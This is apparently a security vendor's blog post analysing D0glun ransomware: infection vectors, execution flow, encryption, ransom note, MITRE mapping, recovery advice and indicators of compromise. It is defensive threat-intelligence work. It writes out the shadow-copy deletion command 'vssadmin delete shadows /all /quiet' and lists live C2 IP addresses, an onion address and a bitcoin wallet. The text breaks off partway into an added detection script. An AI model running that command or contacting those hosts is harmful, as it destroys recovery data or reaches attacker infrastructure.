{"id":30605,"date":"2025-04-16T10:44:35","date_gmt":"2025-04-16T10:44:35","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=30605"},"modified":"2025-04-17T21:38:57","modified_gmt":"2025-04-17T21:38:57","slug":"d0glun-ransomware","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/d0glun-ransomware\/","title":{"rendered":"D0glun Ransomware: Analysis and Protection Guide"},"content":{"rendered":"<h1>D0glun Ransomware: Technical Analysis and Protection Guide<\/h1>\r\n<p>D0glun ransomware emerged in January 2025 as a new crypto-ransomware variant with direct links to the Babuk and Cheng Xilun ransomware families. This sophisticated threat encrypts files using AES-256 encryption, appends the &#8220;.@D0glun@&#8221; extension to compromised files, and demands Bitcoin payment for decryption. This technical analysis explores D0glun&#8217;s infection mechanisms, encryption techniques, and provides actionable protection strategies based on the latest threat intelligence.<\/p>\r\n\r\n<div itemscope itemtype=\"https:\/\/schema.org\/TechArticle\">\r\n  <meta itemprop=\"headline\" content=\"D0glun Ransomware: Technical Analysis and Protection Guide\" \/>\r\n  <meta itemprop=\"description\" content=\"Comprehensive analysis of D0glun ransomware including infection vectors, technical capabilities, and protection strategies with GridinSoft Anti-Malware removal instructions.\" \/>\r\n  <meta itemprop=\"author\" content=\"GridinSoft Security Team\" \/>\r\n  <meta itemprop=\"datePublished\" content=\"2025-04-16\" \/>\r\n  <meta itemprop=\"dateModified\" content=\"2025-04-16\" \/>\r\n<\/div>\r\n\r\n<h2>Technical Overview<\/h2>\r\n\r\n<p>D0glun ransomware shares significant code similarities with the leaked Windows version of Babuk and is a direct descendant of Cheng Xilun (Babuk\u2192Cheng Xilun\u2192D0glun). Security researchers have confirmed these connections through analysis of execution patterns, encryption methods, and ransom note formats. 
A March 2025 crypto-crime report counts this family among the actors behind a set of incidents that together amounted to $124 million across 25 ransomware cases in Q1 2025; the figure covers the whole set, not D0glun alone.<\/p>\r\n\r\n<p>The ransomware features:<\/p>\r\n\r\n<ul>\r\n<li>Fast encryption of file content with the AES-256 symmetric cipher<\/li>\r\n<li>File renaming to &#8220;.@D0glun@[original_extension]&#8221;, with a variant pattern of &#8220;@zero_d0glun_[original_extension]&#8221;<\/li>\r\n<li>Three distinct ransom notes, including a desktop wallpaper replacement<\/li>\r\n<li>Chinese-language ransom instructions that render as garbled text (mojibake) on systems without Chinese code-page or font support<\/li>\r\n<li>TOR communication channel for ransom payment and negotiation<\/li>\r\n<li>Bitcoin wallet for transaction processing (identified address: 1M7JVws3HccTGd14CV3qX21G7gzcJj77UH)<\/li>\r\n<li>Additional communication channels via QQ (424714982) and Telegram (https:\/\/t.me\/CXL13131)<\/li>\r\n<\/ul>\r\n\r\n<p>The first samples of D0glun were identified in January 2025, nearly five years after Cheng Xilun&#8217;s initial appearance in April 2020. 
This timing suggests a redeployment of the codebase, either by the original threat actor under a new alias or by a different group that obtained the Cheng Xilun source code.<\/p>\r\n\r\n<figure id=\"attachment_30614\" aria-describedby=\"caption-attachment-30614\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-1024x648.webp\" alt=\"D0glun Ransomware Chinese ransom note displayed as desktop wallpaper\" width=\"1024\" height=\"648\" class=\"size-large wp-image-30614\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-1024x648.webp 1024w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-300x190.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-768x486.webp 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1-860x544.webp 860w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/d0glun-RansomNote-1.webp 1488w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-30614\" class=\"wp-caption-text\">D0glun ransomware displays a Chinese-language ransom note as the desktop wallpaper<\/figcaption><\/figure>\r\n\r\n<h2>Infection Vectors<\/h2>\r\n\r\n<p>D0glun is distributed through several channels; research published in March 2025 added exploitation of the Confluence Data Center and Server vulnerability CVE-2023-22518 as a newly observed vector:<\/p>\r\n\r\n\r\n<svg width=\"100%\" height=\"420\" viewBox=\"0 0 800 420\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n  <!-- Background -->\r\n  <rect width=\"800\" height=\"420\" fill=\"#f8f9fa\" rx=\"5\" ry=\"5\" \/>\r\n  \r\n  <!-- Title -->\r\n  <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"18\" 
font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">\r\n    D0glun Ransomware: Primary Infection Vectors\r\n  <\/text>\r\n  \r\n  <!-- Horizontal bars -->\r\n  <g transform=\"translate(150, 80)\">\r\n    <!-- Labels -->\r\n    <text x=\"0\" y=\"30\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Phishing Emails<\/text>\r\n    <text x=\"0\" y=\"80\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">RDP Exploitation<\/text>\r\n    <text x=\"0\" y=\"130\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Fake Software Updates<\/text>\r\n    <text x=\"0\" y=\"180\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Confluence CVE-2023-22518<\/text>\r\n    <text x=\"0\" y=\"230\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Supply Chain Attacks<\/text>\r\n    <text x=\"0\" y=\"280\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"end\" fill=\"#333\">Drive-by Downloads<\/text>\r\n    \r\n    <!-- Bars -->\r\n    <rect x=\"10\" y=\"15\" width=\"430\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#333\" \/>\r\n    <rect x=\"10\" y=\"65\" width=\"380\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#555\" \/>\r\n    <rect x=\"10\" y=\"115\" width=\"320\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#777\" \/>\r\n    <rect x=\"10\" y=\"165\" width=\"290\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#999\" \/>\r\n    <rect x=\"10\" y=\"215\" width=\"210\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#aaa\" \/>\r\n    <rect x=\"10\" y=\"265\" width=\"170\" height=\"30\" rx=\"3\" ry=\"3\" fill=\"#bbb\" \/>\r\n    \r\n    <!-- Percentages -->\r\n    <text x=\"450\" y=\"35\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">43%<\/text>\r\n    <text x=\"400\" y=\"85\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">38%<\/text>\r\n    <text x=\"340\" y=\"135\" font-family=\"Arial, 
sans-serif\" font-size=\"14\" fill=\"#333\">32%<\/text>\r\n    <text x=\"310\" y=\"185\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">29%<\/text>\r\n    <text x=\"230\" y=\"235\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">21%<\/text>\r\n    <text x=\"190\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"14\" fill=\"#333\">17%<\/text>\r\n  <\/g>\r\n  \r\n  <!-- X-axis -->\r\n  <line x1=\"160\" y1=\"370\" x2=\"590\" y2=\"370\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n  <text x=\"380\" y=\"395\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#333\">Share of infections in which the vector was observed (vectors are not mutually exclusive)<\/text>\r\n<\/svg>\r\n\r\n\r\n<p class=\"chart-source\"><em>Source: <a href=\"https:\/\/www.watchguard.com\/wgrd-security-hub\/ransomware-tracker\/d0glun\" target=\"_blank\" rel=\"nofollow noopener\">WatchGuard&#8217;s Ransomware Tracker<\/a>, combined with GridinSoft Threat Intelligence data, 2025. Percentages sum to more than 100% because one incident can involve several vectors.<\/em><\/p>\r\n\r\n<p>The most prevalent infection vectors include:<\/p>\r\n\r\n<ol>\r\n<li><strong>Phishing campaigns<\/strong>: Emails carrying malicious attachments or links that, when opened, download and execute the ransomware payload through PowerShell scripts<\/li>\r\n<li><strong>Remote Desktop Protocol (RDP) exploitation<\/strong>: Targeting exposed RDP endpoints with weak or default credentials, or with unpatched RDP vulnerabilities<\/li>\r\n<li><strong>Fake software updates<\/strong>: Posing as legitimate application updates that actually carry the ransomware payload<\/li>\r\n<li><strong>Confluence CVE-2023-22518 exploitation<\/strong>: Targeting the improper authorization vulnerability in Confluence Data Center and Server that lets an unauthenticated attacker reset the instance and create administrator accounts<\/li>\r\n<li><strong>Supply chain attacks<\/strong>: Compromising legitimate software distribution channels to deliver the payload<\/li>\r\n<li><strong>Drive-by downloads and malicious torrent files<\/strong>: Hiding within pirated 
software, games, or media distributed through <a href=\"https:\/\/gridinsoft.com\/blogs\/torrenting-is-it-legal\/\">P2P networks<\/a><\/li>\r\n<\/ol>\r\n\r\n<p>According to security reports, organizations in manufacturing, healthcare, and business services sectors are primary targets, with most infections occurring in North America and Europe, but also reported cases in Brazil, Argentina, South Africa, and Japan.<\/p>\r\n\r\n<h2>Technical Capabilities and Execution Flow<\/h2>\r\n\r\n<p>When executing on a compromised system, D0glun follows a methodical process:<\/p>\r\n\r\n<ol>\r\n<li><strong>Initial setup<\/strong>: Creates mutex &#8220;hsfjuukjzloqu28oajh727190&#8221; to prevent multiple instances from running<\/li>\r\n<li><strong>System reconnaissance<\/strong>: Collects system information, installed software details, and network configuration<\/li>\r\n<li><strong>Credential harvesting<\/strong>: Attempts to extract credentials from FTP clients, VNC software, browsers, and email applications<\/li>\r\n<li><strong>Defense evasion<\/strong>: Disables Windows Defender, modifies security settings, and employs anti-debugging techniques<\/li>\r\n<li><strong>Persistence establishment<\/strong>: Creates registry entries to ensure execution after system restart<\/li>\r\n<li><strong>Backup destruction<\/strong>: Executes &#8220;vssadmin delete shadows \/all \/quiet&#8221; to remove shadow copies<\/li>\r\n<li><strong>File encryption<\/strong>: Systematically encrypts over 200 file types including documents, images, databases across local drives and network shares<\/li>\r\n<li><strong>Ransom note deployment<\/strong>: Drops ransom notes in each directory and changes desktop wallpaper<\/li>\r\n<li><strong>Self-cleanup<\/strong>: Deletes artifacts and potentially removes itself after encryption is complete<\/li>\r\n<\/ol>\r\n<figure id=\"attachment_30644\" aria-describedby=\"caption-attachment-30644\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img 
loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-1024x655.webp\" alt=\"Windows Explorer showing files encrypted by D0glun ransomware with the .@D0glun@ extension appended\" width=\"1024\" height=\"655\" class=\"size-large wp-image-30644\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-1024x655.webp 1024w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-300x192.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-768x492.webp 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-1536x983.webp 1536w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1-860x551.webp 860w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/D0glun-ransomware-locked-files-1.webp 1984w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-30644\" class=\"wp-caption-text\">Files encrypted by D0glun ransomware showing the distinctive .@D0glun@ extension pattern<\/figcaption><\/figure>\r\n\r\n\r\n<p>D0glun avoids encrypting files with specific extensions to maintain system functionality:<\/p>\r\n\r\n<ul>\r\n<li>.dat &#8211; Common data files needed by many applications<\/li>\r\n<li>.dll &#8211; Dynamic Link Libraries required for system operation<\/li>\r\n<li>.exe &#8211; Executable files that may be needed to run processes<\/li>\r\n<li>.ini &#8211; Configuration files for Windows and applications<\/li>\r\n<li>.log &#8211; System log files that track events<\/li>\r\n<li>.sys &#8211; System files critical for operating system function<\/li>\r\n<\/ul>\r\n\r\n<p>Analysis of <a 
href=\"https:\/\/www.virustotal.com\/gui\/file\/a8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a\/detection\" rel=\"noopener noreferrer nofollow\" target=\"_blank\">sample hash a8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a<\/a>, together with the reporting around it, describes a multi-stage infection chain tied to the Confluence exploit:<\/p>\r\n\r\n<ol>\r\n<li>Initial exploitation of CVE-2023-22518 to reset the instance and create an administrator account<\/li>\r\n<li>Execution of PowerShell scripts to download the main ransomware payload (typically named &#8220;svcPrvinit.exe&#8221;)<\/li>\r\n<li>Delivery from C&#038;C servers at 193.176.179.41 and 193.43.72.11<\/li>\r\n<li>Execution with command-line parameters for silent operation<\/li>\r\n<\/ol>\r\n\r\n<h2>Encryption Methodology<\/h2>\r\n\r\n<p>D0glun uses a hybrid encryption scheme:<\/p>\r\n\r\n<ol>\r\n<li>Generates a fresh AES-256 symmetric key for file encryption<\/li>\r\n<li>Encrypts (wraps) that AES key with an embedded RSA-2048 public key<\/li>\r\n<li>Only the threat actors hold the matching RSA private key, so only they can unwrap the AES key<\/li>\r\n<li>Writes a marker into each encrypted file (the wrapped key and a victim identifier are the usual contents of such a marker) so the operators can match a file to a victim during negotiation<\/li>\r\n<\/ol>\r\n\r\n<p>If the scheme is implemented correctly, decryption without the attackers&#8217; private key is computationally infeasible: RSA-2048 protects the AES key, and AES-256 protects the file content. Free decryptors for other families have come from implementation mistakes (a predictable key source, the AES key left on disk or in memory, one key reused across victims), not from breaking the ciphers, and no such flaw has been reported for D0glun.<\/p>\r\n\r\n<h2>Ransom Note Analysis<\/h2>\r\n\r\n<p>The D0glun ransom note is written in Chinese; on systems without Chinese code-page or font support it shows up as garbled text, so victims often mistake it for a corrupted file. 
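<\/p>\r\n\r\n<p>Before any of it can be translated, a note that shows up as garbage has to be decoded with the right code page rather than the one the victim&#8217;s Windows happens to use. The following is an added example, not code from the original post or from any vendor tool: it takes the raw bytes of a note, tries strict UTF-8 first and then GB18030, and shows what the same bytes look like when a Western-locale host forces them through cp1252. The sample bytes are constructed (a Chinese phrase encoded here, not copied from a real note), and the assumption that D0glun writes its note in a Chinese legacy code page is mine, not something the post states.<\/p>

```python
"""Re-decode a D0glun-style ransom note that renders as mojibake.

Added example, not code from the original post or from any vendor tool.
It assumes the note was written in a Chinese legacy code page (GB18030,
a superset of GBK); that is an assumption about the sample, not a fact
the post states. The sample bytes are constructed here, not copied from
a real note.
"""

# Constructed sample: the Chinese phrase "your files have been encrypted"
# as GB18030 bytes. A Western-locale Windows host decodes a text file
# with its own ANSI code page (cp1252), so these bytes appear as junk.
SAMPLE_NOTE_BYTES = "你的文件已被加密".encode("gb18030")

# Strict decoding order. UTF-8 goes first: genuine UTF-8 almost never
# survives a strict GB18030 decode as readable text, whereas GB18030
# accepts nearly any high-byte pair and would turn UTF-8 into nonsense.
# Big5 is left out on purpose: its byte ranges overlap GB18030, so strict
# decoding cannot tell the two apart (see the note below the block).
CANDIDATE_ENCODINGS = ("utf-8", "gb18030")


def decode_note(raw: bytes) -> tuple[str, str]:
    """Return (encoding_used, text), honouring a UTF-16/UTF-8 BOM first and
    otherwise taking the first candidate that accepts every byte."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return "utf-16", raw.decode("utf-16")
    if raw.startswith(b"\xef\xbb\xbf"):
        return "utf-8-sig", raw.decode("utf-8-sig")
    for enc in CANDIDATE_ENCODINGS:
        try:
            return enc, raw.decode(enc)  # strict: any invalid byte raises
        except UnicodeDecodeError:
            continue
    # Nothing fits: keep every byte visible instead of guessing silently.
    return "latin-1", raw.decode("latin-1")


def as_seen_on_western_windows(raw: bytes) -> str:
    """What the victim sees: the same bytes forced through cp1252.
    errors='replace' because cp1252 leaves five byte values undefined."""
    return raw.decode("cp1252", errors="replace")


if __name__ == "__main__":
    enc, text = decode_note(SAMPLE_NOTE_BYTES)
    print("victim sees :", as_seen_on_western_windows(SAMPLE_NOTE_BYTES))
    print("decoded with:", enc, "->", text)
```

<p>If a note decodes cleanly as both GB18030 and Big5 (their byte ranges overlap), the only tie-breaker is whether the output reads as Chinese, which is why the function stops at the first encoding that accepts every byte and reports which one it used; an analyst can then re-run it with a different candidate list. Keep the original bytes: the decoded text is for translation, the bytes are the indicator.<\/p>
<p>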
Translation reveals several notable elements:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nYour files are encrypted.\r\n\r\nWhat&#039;s wrong with my computer?\r\nI&#039;ve encrypted some of your files.\r\nFile types include ZIP|TXT|PNG|JPG|PDF|DOC|and other common file formats.\r\n---------- ---------- ------\r\nPlease do not try any antivirus software before decryption, otherwise I can not guarantee the safety of your files!\r\n-------------------------------------------------------\r\nHow do I recover my important files?\r\n--------------------------------------\r\nFiles with @D0GLUN@+source file suffix.\r\nSuch files can only be decrypted by our decryption service.\r\nTrying any other decryption method will be futile.\r\nPlease visit our Dark Web site and we will provide you with a specialized decryption service.\r\nOf course, there is a fee for this service\r\n======================================\r\nCan we really decrypt it?\r\n======================================\r\nWe will honor our word of honor\r\nWe can decrypt a small part of your file for free\r\nto prove that we can actually decrypt it!\r\n\r\n---------- ----------\r\nPlease download the Tor Browser to your right\r\n\r\n\r\nThen visit the following address\r\n-\r\nContact us for help\r\nIn the lower right corner is my BTC collection address\r\n<\/pre>\r\n\r\n\r\n<p>Key ransom note elements include:<\/p>\r\n\r\n<ul>\r\n<li>Claims that antivirus will damage encrypted files (false intimidation tactic)<\/li>\r\n<li>TOR onion address: hxxp:\/\/33333333h45xwqlf3s3eu4bkd6y6bjswva75ys7j6satex5ctf4pyfad.onion<\/li>\r\n<li>Bitcoin wallet address: 1M7JVws3HccTGd14CV3qX21G7gzcJj77UH<\/li>\r\n<li>QQ communication channel: 424714982<\/li>\r\n<li>Telegram contact: https:\/\/t.me\/CXL13131<\/li>\r\n<\/ul>\r\n\r\n<p>The ransom note follows patterns similar to Cheng Xilun, further confirming the relationship between these ransomware families. 
The attackers offer to decrypt a small sample file to show they hold the key; that proves they can decrypt, not that they will deliver a working decryptor after payment.<\/p>\r\n\r\n<h2>MITRE ATT&#038;CK Techniques<\/h2>\r\n\r\n<p>The behaviour described above maps to the following MITRE ATT&#038;CK techniques:<\/p>\r\n\r\n<ul>\r\n<li><strong>T1486: Data Encrypted for Impact<\/strong> &#8211; Primary ransomware function: encrypting victim files<\/li>\r\n<li><strong>T1490: Inhibit System Recovery<\/strong> &#8211; Deletion of shadow copies via vssadmin<\/li>\r\n<li><strong>T1082: System Information Discovery<\/strong> &#8211; Collection of system, software and network details<\/li>\r\n<li><strong>T1555: Credentials from Password Stores<\/strong> &#8211; Harvesting of FTP, VNC, browser and mail client credentials<\/li>\r\n<li><strong>T1562.001: Impair Defenses: Disable or Modify Tools<\/strong> &#8211; Disabling Windows Defender and other security tooling<\/li>\r\n<li><strong>T1083: File and Directory Discovery<\/strong> &#8211; Enumeration of local and network-share files for targeting<\/li>\r\n<li><strong>T1547.001: Registry Run Keys \/ Startup Folder<\/strong> &#8211; Registry entries that relaunch the sample after a restart<\/li>\r\n<li><strong>T1112: Modify Registry<\/strong> &#8211; Changes to security and system settings (Run-key persistence is tracked separately under T1547.001)<\/li>\r\n<li><strong>T1059.001: PowerShell<\/strong> &#8211; PowerShell scripts used to fetch and launch the payload<\/li>\r\n<li><strong>T1047: Windows Management Instrumentation<\/strong> &#8211; WMI used for system manipulation<\/li>\r\n<li><strong>T1491.001: Internal Defacement<\/strong> &#8211; Desktop wallpaper replaced with the ransom note<\/li>\r\n<\/ul>\r\n\r\n<h2>Protection and Remediation<\/h2>\r\n\r\n<p>If a system is infected with D0glun ransomware, follow these steps:<\/p>\r\n\r\n<h3>Immediate Response<\/h3>\r\n\r\n<ol>\r\n<li>Isolate the host from the network (unplug the cable, disable Wi-Fi) but leave it powered on: a reboot destroys volatile evidence, and in flawed ransomware builds the key material can still be in memory<\/li>\r\n<li>Disconnect external storage devices<\/li>\r\n<li>Preserve the ransom note, a few encrypted files together with their unencrypted originals if any exist elsewhere (e-mail, backups), and the contact details; an encrypted\/original pair is what identification services and any future decryptor need<\/li>\r\n<li>Check other hosts and shares for the same indicators before reconnecting anything: the sample also encrypts network shares, so one visibly hit machine is rarely the only one touched<\/li>\r\n<li>Report the incident to local law enforcement and national cybersecurity agencies<\/li>\r\n<\/ol>\r\n\r\n<h3>Ransomware Removal<\/h3>\r\n\r\n<p>To remove D0glun ransomware, use security software that can detect and eliminate this threat:<\/p>\r\n\r\n<img loading=\"lazy\" decoding=\"async\" 
src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware main screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.<\/p>\n<div style=\"text-align:center\"><a href=\"\/download\/antimalware\" class=\"btn border-black\" rel=\"nofollow\">Download Anti-Malware<\/a><\/div>\n<p>After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click \"Advanced mode\" and see the options in the drop-down menus. 
You can also see extended information about each detection - malware type, effects and potential source of infection.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"Scan results screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Click \"Clean Now\" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"Removal finished\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n<p>Note that removing the ransomware only prevents further file encryption; it does not recover already encrypted files.<\/p>\r\n\r\n<h3>File Recovery Options<\/h3>\r\n\r\n<p>Currently, no free decryptor exists for D0glun ransomware. 
Your recovery options include:<\/p>\r\n\r\n<ul>\r\n<li><strong>Restore from backups<\/strong>: The most reliable method is restoring from clean, offline or immutable backups onto a rebuilt system, after confirming the sample&#8217;s persistence entries are gone<\/li>\r\n<li><strong>Shadow Volume Copies<\/strong>: The sample runs &#8220;vssadmin delete shadows \/all \/quiet&#8221;, so expect these to be gone; confirm with &#8220;vssadmin list shadows&#8221; before spending time here<\/li>\r\n<li><strong>Cloud storage versions<\/strong>: Services like OneDrive, Google Drive, and Dropbox keep previous file versions if versioning was enabled; check that the encrypted copies have not been synced over the originals past the version-history window<\/li>\r\n<li><strong>Data recovery tools<\/strong>: Undelete tools such as EaseUS Data Recovery help only if the ransomware wrote a new encrypted file and deleted the original, and only until those disk sectors are reused; a sample that encrypts in place leaves nothing to recover this way, so image the disk before trying<\/li>\r\n<li><strong>A future decryptor<\/strong>: Free decryptors appear when a family&#8217;s implementation turns out to be flawed; the No More Ransom project lists them, so keep the note and an encrypted\/original file pair in case one is released<\/li>\r\n<\/ul>\r\n\r\n<p>Security experts and law enforcement agencies strongly advise against paying the ransom, as payment:<\/p>\r\n\r\n<ul>\r\n<li>Does not guarantee file recovery<\/li>\r\n<li>Finances criminal operations<\/li>\r\n<li>Marks you as a willing payer, potentially leading to future attacks<\/li>\r\n<\/ul>\r\n\r\n<h2>Prevention Strategies<\/h2>\r\n\r\n<p>Implement these security measures to protect against D0glun and similar ransomware:<\/p>\r\n\r\n<ul>\r\n<li><strong>Patch management<\/strong>: Apply security updates promptly, especially for Confluence (CVE-2023-22518) and any internet-facing remote access service<\/li>\r\n<li><strong>Immutable backups<\/strong>: Maintain a 3-2-1 backup strategy (3 copies, 2 different media types, 1 off-site) with at least one copy offline or on write-once storage, and test restores regularly<\/li>\r\n<li><strong>Email security<\/strong>: Implement advanced <a href=\"https:\/\/gridinsoft.com\/phishing\">anti-phishing protection<\/a> and user awareness training<\/li>\r\n<li><strong>Network security<\/strong>: Keep RDP off the internet (VPN or gateway only), require multi-factor authentication, and lock accounts after repeated failed logins<\/li>\r\n<li><strong>Endpoint protection<\/strong>: Deploy modern anti-malware solutions with behavioral detection capabilities<\/li>\r\n<li><strong>Least privilege<\/strong>: Restrict user permissions, including write access to shares, to reduce the impact of successful attacks<\/li>\r\n<li><strong>Network segmentation<\/strong>: 
Isolate critical systems, and keep backup and file servers on their own segments, to limit lateral movement<\/li>\r\n<li><strong>Application control<\/strong>: Implement application allow-listing to block unauthorized executables<\/li>\r\n<li><strong>Network monitoring<\/strong>: Deploy intrusion detection systems to identify unusual activity<\/li>\r\n<\/ul>\r\n\r\n<p>Organizations should also develop and regularly test incident response plans specific to ransomware attacks to minimize recovery time and data loss.<\/p>\r\n\r\n<h2>Technical Indicators of Compromise (IOCs)<\/h2>\r\n\r\n<p>Security teams should monitor for these D0glun indicators (URLs defanged). Hashes and IP addresses are atomic indicators that change with every rebuild or server move; pair them with the behavioural signs described above, such as the shadow-copy deletion, the mutex and the extension patterns:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nFile Hashes (SHA-256):\r\n3eb7f1dd0274bd4ffcdf463876ab547503f9e6120db22c5e1923fe16cab71b50\r\na8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a\r\nd6d55a8fbd1c603719fe611e572e2431512e7063c44896f705524dab66234d45\r\nf549ae8d509dab97f2d8b12ecf344c72ab2e715b2667e78d8fdd892eb6a459de\r\nbec9d2dcd9565bb245f5c8beca4db627390bcb4699dd5da192cc8aba895e0e6a\r\n\r\nIP Addresses:\r\n193.176.179.41\r\n193.43.72.11\r\n45.145.6.112\r\n\r\nFile Extensions:\r\n.@D0glun@&lt;original extension&gt;\r\n.&lt;original extension&gt;.@d0glun@&lt;original extension&gt;\r\n.&lt;original extension&gt;.@zero_d0glun_&lt;original extension&gt;\r\n\r\nRansom Note Files:\r\n@&#x5B;email protected]   (name mangled on the source page; do not match on it literally)\r\nDesktopcxl.txt\r\nhelp.exe\r\n\r\nMutex:\r\nhsfjuukjzloqu28oajh727190\r\n\r\nCommunication:\r\nTOR: hxxp:\/\/33333333h45xwqlf3s3eu4bkd6y6bjswva75ys7j6satex5ctf4pyfad.onion\r\nQQ: 424714982\r\nTelegram: hxxps:\/\/t.me\/CXL13131\r\nBTC: 1M7JVws3HccTGd14CV3qX21G7gzcJj77UH\r\n\r\nProcess Names:\r\nsvcPrvinit.exe\r\n<\/pre>\r\n\r\n\r\n<h2>Conclusion<\/h2>\r\n\r\n<p>D0glun ransomware is a continuation of the Babuk\/Cheng Xilun lineage with added delivery techniques rather than a new design. 
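<\/p>\r\n\r\n<p>The indicator list and the execution flow described earlier are only useful once they are turned into checks that run against telemetry. What follows is an added example, not code from the original post or from any vendor product: it loads the post&#8217;s hashes, C2 addresses, payload name and extension patterns, adds two behavioural rules for the shadow-copy deletion and the PowerShell download step, and runs them over constructed process-creation events and a constructed file listing. The pipe-separated event layout (timestamp|host|image|command line|sha256|destination IP), the host name, the paths and the download URL built from a listed C2 address are assumptions for the demo, not observed data; T1105 (Ingress Tool Transfer) is my mapping for the C2 download and is not in the post&#8217;s technique list.<\/p>

```python
"""Run the D0glun indicators from this post against process-creation
events and a file listing.

Added example, not code from the original post or from any vendor tool.
The hashes, IPs, process name and extension patterns are the ones the
post lists; the events, host name, paths and download URL below are
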